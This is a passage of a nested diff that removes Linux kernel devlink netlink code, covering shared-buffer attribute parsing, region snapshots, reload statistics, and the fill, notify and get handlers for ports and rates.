+-	if (!attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE])
+-		return -EINVAL;
+-
+-	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE]);
+-	if (val != DEVLINK_SB_THRESHOLD_TYPE_STATIC &&
+-	    val != DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC)
+-		return -EINVAL;
+-	*p_th_type = val;
+-	return 0;
+-}
+-
+-static int
+-devlink_sb_th_type_get_from_info(struct genl_info *info,
+-				 enum devlink_sb_threshold_type *p_th_type)
+-{
+-	return devlink_sb_th_type_get_from_attrs(info->attrs, p_th_type);
+-}
+-
+-static int
+-devlink_sb_tc_index_get_from_attrs(struct devlink_sb *devlink_sb,
+-				   struct nlattr **attrs,
+-				   enum devlink_sb_pool_type pool_type,
+-				   u16 *p_tc_index)
+-{
+-	u16 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_TC_INDEX])
+-		return -EINVAL;
+-
+-	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_TC_INDEX]);
+-	if (pool_type == DEVLINK_SB_POOL_TYPE_INGRESS &&
+-	    val >= devlink_sb->ingress_tc_count)
+-		return -EINVAL;
+-	if (pool_type == DEVLINK_SB_POOL_TYPE_EGRESS &&
+-	    val >= devlink_sb->egress_tc_count)
+-		return -EINVAL;
+-	*p_tc_index = val;
+-	return 0;
+-}
+-
+-static int
+-devlink_sb_tc_index_get_from_info(struct devlink_sb *devlink_sb,
+-				  struct genl_info *info,
+-				  enum devlink_sb_pool_type pool_type,
+-				  u16 *p_tc_index)
+-{
+-	return devlink_sb_tc_index_get_from_attrs(devlink_sb, info->attrs,
+-						  pool_type, p_tc_index);
+-}
+-
+-struct devlink_region {
+-	struct devlink *devlink;
+-	struct devlink_port *port;
+-	struct list_head list;
+-	union {
+-		const struct devlink_region_ops *ops;
+-		const struct devlink_port_region_ops *port_ops;
+-	};
+-	struct mutex snapshot_lock; /* protects snapshot_list,
+-				     * max_snapshots and cur_snapshots
+-				     * consistency.
+-				     */
+-	struct list_head snapshot_list;
+-	u32 max_snapshots;
+-	u32 cur_snapshots;
+-	u64 size;
+-};
+-
+-struct devlink_snapshot {
+-	struct list_head list;
+-	struct devlink_region *region;
+-	u8 *data;
+-	u32 id;
+-};
+-
+-static struct devlink_region *
+-devlink_region_get_by_name(struct devlink *devlink, const char *region_name)
+-{
+-	struct devlink_region *region;
+-
+-	list_for_each_entry(region, &devlink->region_list, list)
+-		if (!strcmp(region->ops->name, region_name))
+-			return region;
+-
+-	return NULL;
+-}
+-
+-static struct devlink_region *
+-devlink_port_region_get_by_name(struct devlink_port *port,
+-				const char *region_name)
+-{
+-	struct devlink_region *region;
+-
+-	list_for_each_entry(region, &port->region_list, list)
+-		if (!strcmp(region->ops->name, region_name))
+-			return region;
+-
+-	return NULL;
+-}
+-
+-static struct devlink_snapshot *
+-devlink_region_snapshot_get_by_id(struct devlink_region *region, u32 id)
+-{
+-	struct devlink_snapshot *snapshot;
+-
+-	list_for_each_entry(snapshot, &region->snapshot_list, list)
+-		if (snapshot->id == id)
+-			return snapshot;
+-
+-	return NULL;
+-}
+-
+-#define DEVLINK_NL_FLAG_NEED_PORT		BIT(0)
+-#define DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT	BIT(1)
+-#define DEVLINK_NL_FLAG_NEED_RATE		BIT(2)
+-#define DEVLINK_NL_FLAG_NEED_RATE_NODE		BIT(3)
+-#define DEVLINK_NL_FLAG_NEED_LINECARD		BIT(4)
+-
+-static int devlink_nl_pre_doit(const struct genl_ops *ops,
+-			       struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink_port *devlink_port;
+-	struct devlink *devlink;
+-	int err;
+-
+-	devlink = devlink_get_from_attrs(genl_info_net(info), info->attrs);
+-	if (IS_ERR(devlink))
+-		return PTR_ERR(devlink);
+-	devl_lock(devlink);
+-	info->user_ptr[0] = devlink;
+-	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_PORT) {
+-		devlink_port = devlink_port_get_from_info(devlink, info);
+-		if (IS_ERR(devlink_port)) {
+-			err = PTR_ERR(devlink_port);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = devlink_port;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT) {
+-		devlink_port = devlink_port_get_from_info(devlink, info);
+-		if (!IS_ERR(devlink_port))
+-			info->user_ptr[1] = devlink_port;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE) {
+-		struct devlink_rate *devlink_rate;
+-
+-		devlink_rate = devlink_rate_get_from_info(devlink, info);
+-		if (IS_ERR(devlink_rate)) {
+-			err = PTR_ERR(devlink_rate);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = devlink_rate;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE_NODE) {
+-		struct devlink_rate *rate_node;
+-
+-		rate_node = devlink_rate_node_get_from_info(devlink, info);
+-		if (IS_ERR(rate_node)) {
+-			err = PTR_ERR(rate_node);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = rate_node;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
+-		linecard = devlink_linecard_get_from_info(devlink, info);
+-		if (IS_ERR(linecard)) {
+-			err = PTR_ERR(linecard);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = linecard;
+-	}
+-	return 0;
+-
+-unlock:
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return err;
+-}
+-
+-static void devlink_nl_post_doit(const struct genl_ops *ops,
+-				 struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink *devlink;
+-
+-	devlink = info->user_ptr[0];
+-	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
+-		linecard = info->user_ptr[1];
+-		devlink_linecard_put(linecard);
+-	}
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-}
+-
+-static struct genl_family devlink_nl_family;
+-
+-enum devlink_multicast_groups {
+-	DEVLINK_MCGRP_CONFIG,
+-};
+-
+-static const struct genl_multicast_group devlink_nl_mcgrps[] = {
+-	[DEVLINK_MCGRP_CONFIG] = { .name = DEVLINK_GENL_MCGRP_CONFIG_NAME },
+-};
+-
+-static int devlink_nl_put_handle(struct sk_buff *msg, struct devlink *devlink)
+-{
+-	if (nla_put_string(msg, DEVLINK_ATTR_BUS_NAME, devlink->dev->bus->name))
+-		return -EMSGSIZE;
+-	if (nla_put_string(msg, DEVLINK_ATTR_DEV_NAME, dev_name(devlink->dev)))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_nl_put_nested_handle(struct sk_buff *msg, struct devlink *devlink)
+-{
+-	struct nlattr *nested_attr;
+-
+-	nested_attr = nla_nest_start(msg, DEVLINK_ATTR_NESTED_DEVLINK);
+-	if (!nested_attr)
+-		return -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, nested_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, nested_attr);
+-	return -EMSGSIZE;
+-}
+-
+-struct devlink_reload_combination {
+-	enum devlink_reload_action action;
+-	enum devlink_reload_limit limit;
+-};
+-
+-static const struct devlink_reload_combination devlink_reload_invalid_combinations[] = {
+-	{
+-		/* can't reinitialize driver with no down time */
+-		.action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-		.limit = DEVLINK_RELOAD_LIMIT_NO_RESET,
+-	},
+-};
+-
+-static bool
+-devlink_reload_combination_is_invalid(enum devlink_reload_action action,
+-				      enum devlink_reload_limit limit)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)
+-		if (devlink_reload_invalid_combinations[i].action == action &&
+-		    devlink_reload_invalid_combinations[i].limit == limit)
+-			return true;
+-	return false;
+-}
+-
+-static bool
+-devlink_reload_action_is_supported(struct devlink *devlink, enum devlink_reload_action action)
+-{
+-	return test_bit(action, &devlink->ops->reload_actions);
+-}
+-
+-static bool
+-devlink_reload_limit_is_supported(struct devlink *devlink, enum devlink_reload_limit limit)
+-{
+-	return test_bit(limit, &devlink->ops->reload_limits);
+-}
+-
+-static int devlink_reload_stat_put(struct sk_buff *msg,
+-				   enum devlink_reload_limit limit, u32 value)
+-{
+-	struct nlattr *reload_stats_entry;
+-
+-	reload_stats_entry = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS_ENTRY);
+-	if (!reload_stats_entry)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_STATS_LIMIT, limit) ||
+-	    nla_put_u32(msg, DEVLINK_ATTR_RELOAD_STATS_VALUE, value))
+-		goto nla_put_failure;
+-	nla_nest_end(msg, reload_stats_entry);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, reload_stats_entry);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_reload_stats_put(struct sk_buff *msg, struct devlink *devlink, bool is_remote)
+-{
+-	struct nlattr *reload_stats_attr, *act_info, *act_stats;
+-	int i, j, stat_idx;
+-	u32 value;
+-
+-	if (!is_remote)
+-		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS);
+-	else
+-		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_REMOTE_RELOAD_STATS);
+-
+-	if (!reload_stats_attr)
+-		return -EMSGSIZE;
+-
+-	for (i = 0; i <= DEVLINK_RELOAD_ACTION_MAX; i++) {
+-		if ((!is_remote &&
+-		     !devlink_reload_action_is_supported(devlink, i)) ||
+-		    i == DEVLINK_RELOAD_ACTION_UNSPEC)
+-			continue;
+-		act_info = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_INFO);
+-		if (!act_info)
+-			goto nla_put_failure;
+-
+-		if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_ACTION, i))
+-			goto action_info_nest_cancel;
+-		act_stats = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_STATS);
+-		if (!act_stats)
+-			goto action_info_nest_cancel;
+-
+-		for (j = 0; j <= DEVLINK_RELOAD_LIMIT_MAX; j++) {
+-			/* Remote stats are shown even if not locally supported.
+-			 * Stats of actions with unspecified limit are shown
+-			 * though drivers don't need to register unspecified
+-			 * limit.
+-			 */
+-			if ((!is_remote && j != DEVLINK_RELOAD_LIMIT_UNSPEC &&
+-			     !devlink_reload_limit_is_supported(devlink, j)) ||
+-			    devlink_reload_combination_is_invalid(i, j))
+-				continue;
+-
+-			stat_idx = j * __DEVLINK_RELOAD_ACTION_MAX + i;
+-			if (!is_remote)
+-				value = devlink->stats.reload_stats[stat_idx];
+-			else
+-				value = devlink->stats.remote_reload_stats[stat_idx];
+-			if (devlink_reload_stat_put(msg, j, value))
+-				goto action_stats_nest_cancel;
+-		}
+-		nla_nest_end(msg, act_stats);
+-		nla_nest_end(msg, act_info);
+-	}
+-	nla_nest_end(msg, reload_stats_attr);
+-	return 0;
+-
+-action_stats_nest_cancel:
+-	nla_nest_cancel(msg, act_stats);
+-action_info_nest_cancel:
+-	nla_nest_cancel(msg, act_info);
+-nla_put_failure:
+-	nla_nest_cancel(msg, reload_stats_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_fill(struct sk_buff *msg, struct devlink *devlink,
+-			   enum devlink_command cmd, u32 portid,
+-			   u32 seq, int flags)
+-{
+-	struct nlattr *dev_stats;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_FAILED, devlink->reload_failed))
+-		goto nla_put_failure;
+-
+-	dev_stats = nla_nest_start(msg, DEVLINK_ATTR_DEV_STATS);
+-	if (!dev_stats)
+-		goto nla_put_failure;
+-
+-	if (devlink_reload_stats_put(msg, devlink, false))
+-		goto dev_stats_nest_cancel;
+-	if (devlink_reload_stats_put(msg, devlink, true))
+-		goto dev_stats_nest_cancel;
+-
+-	nla_nest_end(msg, dev_stats);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-dev_stats_nest_cancel:
+-	nla_nest_cancel(msg, dev_stats);
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_notify(struct devlink *devlink, enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_NEW && cmd != DEVLINK_CMD_DEL);
+-	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_fill(msg, devlink, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_port_attrs_put(struct sk_buff *msg,
+-				     struct devlink_port *devlink_port)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-
+-	if (!devlink_port->attrs_set)
+-		return 0;
+-	if (attrs->lanes) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_LANES, attrs->lanes))
+-			return -EMSGSIZE;
+-	}
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PORT_SPLITTABLE, attrs->splittable))
+-		return -EMSGSIZE;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_FLAVOUR, attrs->flavour))
+-		return -EMSGSIZE;
+-	switch (devlink_port->attrs.flavour) {
+-	case DEVLINK_PORT_FLAVOUR_PCI_PF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_pf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_pf.pf))
+-			return -EMSGSIZE;
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_pf.external))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_VF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_vf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_vf.pf) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_VF_NUMBER, attrs->pci_vf.vf))
+-			return -EMSGSIZE;
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_vf.external))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_SF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_sf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER,
+-				attrs->pci_sf.pf) ||
+-		    nla_put_u32(msg, DEVLINK_ATTR_PORT_PCI_SF_NUMBER,
+-				attrs->pci_sf.sf))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
+-	case DEVLINK_PORT_FLAVOUR_CPU:
+-	case DEVLINK_PORT_FLAVOUR_DSA:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_NUMBER,
+-				attrs->phys.port_number))
+-			return -EMSGSIZE;
+-		if (!attrs->split)
+-			return 0;
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_GROUP,
+-				attrs->phys.port_number))
+-			return -EMSGSIZE;
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER,
+-				attrs->phys.split_subport_number))
+-			return -EMSGSIZE;
+-		break;
+-	default:
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static int devlink_port_fn_hw_addr_fill(const struct devlink_ops *ops,
+-					struct devlink_port *port,
+-					struct sk_buff *msg,
+-					struct netlink_ext_ack *extack,
+-					bool *msg_updated)
+-{
+-	u8 hw_addr[MAX_ADDR_LEN];
+-	int hw_addr_len;
+-	int err;
+-
+-	if (!ops->port_function_hw_addr_get)
+-		return 0;
+-
+-	err = ops->port_function_hw_addr_get(port, hw_addr, &hw_addr_len,
+-					     extack);
+-	if (err) {
+-		if (err == -EOPNOTSUPP)
+-			return 0;
+-		return err;
+-	}
+-	err = nla_put(msg, DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR, hw_addr_len, hw_addr);
+-	if (err)
+-		return err;
+-	*msg_updated = true;
+-	return 0;
+-}
+-
+-static int devlink_nl_rate_fill(struct sk_buff *msg,
+-				struct devlink_rate *devlink_rate,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u16(msg, DEVLINK_ATTR_RATE_TYPE, devlink_rate->type))
+-		goto nla_put_failure;
+-
+-	if (devlink_rate_is_leaf(devlink_rate)) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				devlink_rate->devlink_port->index))
+-			goto nla_put_failure;
+-	} else if (devlink_rate_is_node(devlink_rate)) {
+-		if (nla_put_string(msg, DEVLINK_ATTR_RATE_NODE_NAME,
+-				   devlink_rate->name))
+-			goto nla_put_failure;
+-	}
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_SHARE,
+-			      devlink_rate->tx_share, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_MAX,
+-			      devlink_rate->tx_max, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (devlink_rate->parent)
+-		if (nla_put_string(msg, DEVLINK_ATTR_RATE_PARENT_NODE_NAME,
+-				   devlink_rate->parent->name))
+-			goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static bool
+-devlink_port_fn_state_valid(enum devlink_port_fn_state state)
+-{
+-	return state == DEVLINK_PORT_FN_STATE_INACTIVE ||
+-	       state == DEVLINK_PORT_FN_STATE_ACTIVE;
+-}
+-
+-static bool
+-devlink_port_fn_opstate_valid(enum devlink_port_fn_opstate opstate)
+-{
+-	return opstate == DEVLINK_PORT_FN_OPSTATE_DETACHED ||
+-	       opstate == DEVLINK_PORT_FN_OPSTATE_ATTACHED;
+-}
+-
+-static int devlink_port_fn_state_fill(const struct devlink_ops *ops,
+-				      struct devlink_port *port,
+-				      struct sk_buff *msg,
+-				      struct netlink_ext_ack *extack,
+-				      bool *msg_updated)
+-{
+-	enum devlink_port_fn_opstate opstate;
+-	enum devlink_port_fn_state state;
+-	int err;
+-
+-	if (!ops->port_fn_state_get)
+-		return 0;
+-
+-	err = ops->port_fn_state_get(port, &state, &opstate, extack);
+-	if (err) {
+-		if (err == -EOPNOTSUPP)
+-			return 0;
+-		return err;
+-	}
+-	if (!devlink_port_fn_state_valid(state)) {
+-		WARN_ON_ONCE(1);
+-		NL_SET_ERR_MSG_MOD(extack, "Invalid state read from driver");
+-		return -EINVAL;
+-	}
+-	if (!devlink_port_fn_opstate_valid(opstate)) {
+-		WARN_ON_ONCE(1);
+-		NL_SET_ERR_MSG_MOD(extack,
+-				   "Invalid operational state read from driver");
+-		return -EINVAL;
+-	}
+-	if (nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_STATE, state) ||
+-	    nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_OPSTATE, opstate))
+-		return -EMSGSIZE;
+-	*msg_updated = true;
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_port_function_attrs_put(struct sk_buff *msg, struct devlink_port *port,
+-				   struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_ops *ops;
+-	struct nlattr *function_attr;
+-	bool msg_updated = false;
+-	int err;
+-
+-	function_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PORT_FUNCTION);
+-	if (!function_attr)
+-		return -EMSGSIZE;
+-
+-	ops = port->devlink->ops;
+-	err = devlink_port_fn_hw_addr_fill(ops, port, msg, extack,
+-					   &msg_updated);
+-	if (err)
+-		goto out;
+-	err = devlink_port_fn_state_fill(ops, port, msg, extack, &msg_updated);
+-out:
+-	if (err || !msg_updated)
+-		nla_nest_cancel(msg, function_attr);
+-	else
+-		nla_nest_end(msg, function_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_port_fill(struct sk_buff *msg,
+-				struct devlink_port *devlink_port,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-
+-	/* Hold rtnl lock while accessing port's netdev attributes. */
+-	rtnl_lock();
+-	spin_lock_bh(&devlink_port->type_lock);
+-	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_TYPE, devlink_port->type))
+-		goto nla_put_failure_type_locked;
+-	if (devlink_port->desired_type != DEVLINK_PORT_TYPE_NOTSET &&
+-	    nla_put_u16(msg, DEVLINK_ATTR_PORT_DESIRED_TYPE,
+-			devlink_port->desired_type))
+-		goto nla_put_failure_type_locked;
+-	if (devlink_port->type == DEVLINK_PORT_TYPE_ETH) {
+-		struct net *net = devlink_net(devlink_port->devlink);
+-		struct net_device *netdev = devlink_port->type_dev;
+-
+-		if (netdev && net_eq(net, dev_net(netdev)) &&
+-		    (nla_put_u32(msg, DEVLINK_ATTR_PORT_NETDEV_IFINDEX,
+-				 netdev->ifindex) ||
+-		     nla_put_string(msg, DEVLINK_ATTR_PORT_NETDEV_NAME,
+-				    netdev->name)))
+-			goto nla_put_failure_type_locked;
+-	}
+-	if (devlink_port->type == DEVLINK_PORT_TYPE_IB) {
+-		struct ib_device *ibdev = devlink_port->type_dev;
+-
+-		if (ibdev &&
+-		    nla_put_string(msg, DEVLINK_ATTR_PORT_IBDEV_NAME,
+-				   ibdev->name))
+-			goto nla_put_failure_type_locked;
+-	}
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	rtnl_unlock();
+-	if (devlink_nl_port_attrs_put(msg, devlink_port))
+-		goto nla_put_failure;
+-	if (devlink_nl_port_function_attrs_put(msg, devlink_port, extack))
+-		goto nla_put_failure;
+-	if (devlink_port->linecard &&
+-	    nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX,
+-			devlink_port->linecard->index))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure_type_locked:
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	rtnl_unlock();
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_port_notify(struct devlink_port *devlink_port,
+-				enum devlink_command cmd)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_PORT_NEW && cmd != DEVLINK_CMD_PORT_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, cmd, 0, 0, 0, NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static void devlink_rate_notify(struct devlink_rate *devlink_rate,
+-				enum devlink_command cmd)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_RATE_NEW && cmd != DEVLINK_CMD_RATE_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_rate_fill(msg, devlink_rate, cmd, 0, 0, 0, NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_rate_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_rate *devlink_rate;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-			enum devlink_command cmd = DEVLINK_CMD_RATE_NEW;
+-			u32 id = NETLINK_CB(cb->skb).portid;
+-
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_rate_fill(msg, devlink_rate, cmd, id,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI, NULL);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_rate_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate = info->user_ptr[1];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_rate_fill(msg, devlink_rate, DEVLINK_CMD_RATE_NEW,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static bool
+-devlink_rate_is_parent_node(struct devlink_rate *devlink_rate,
+-			    struct devlink_rate *parent)
+-{
+-	while (parent) {
+-		if (parent == devlink_rate)
+-			return true;
+-		parent = parent->parent;
+-	}
+-	return false;
+-}
+-
+-static int devlink_nl_cmd_get_doit(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+-			      info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
+-				     struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start) {
+-			idx++;
+-			devlink_put(devlink);
+-			continue;
+-		}
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+-				      NETLINK_CB(cb->skb).portid,
+-				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-
+-		if (err)
+-			goto out;
+-		idx++;
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_port_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_PORT_NEW,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
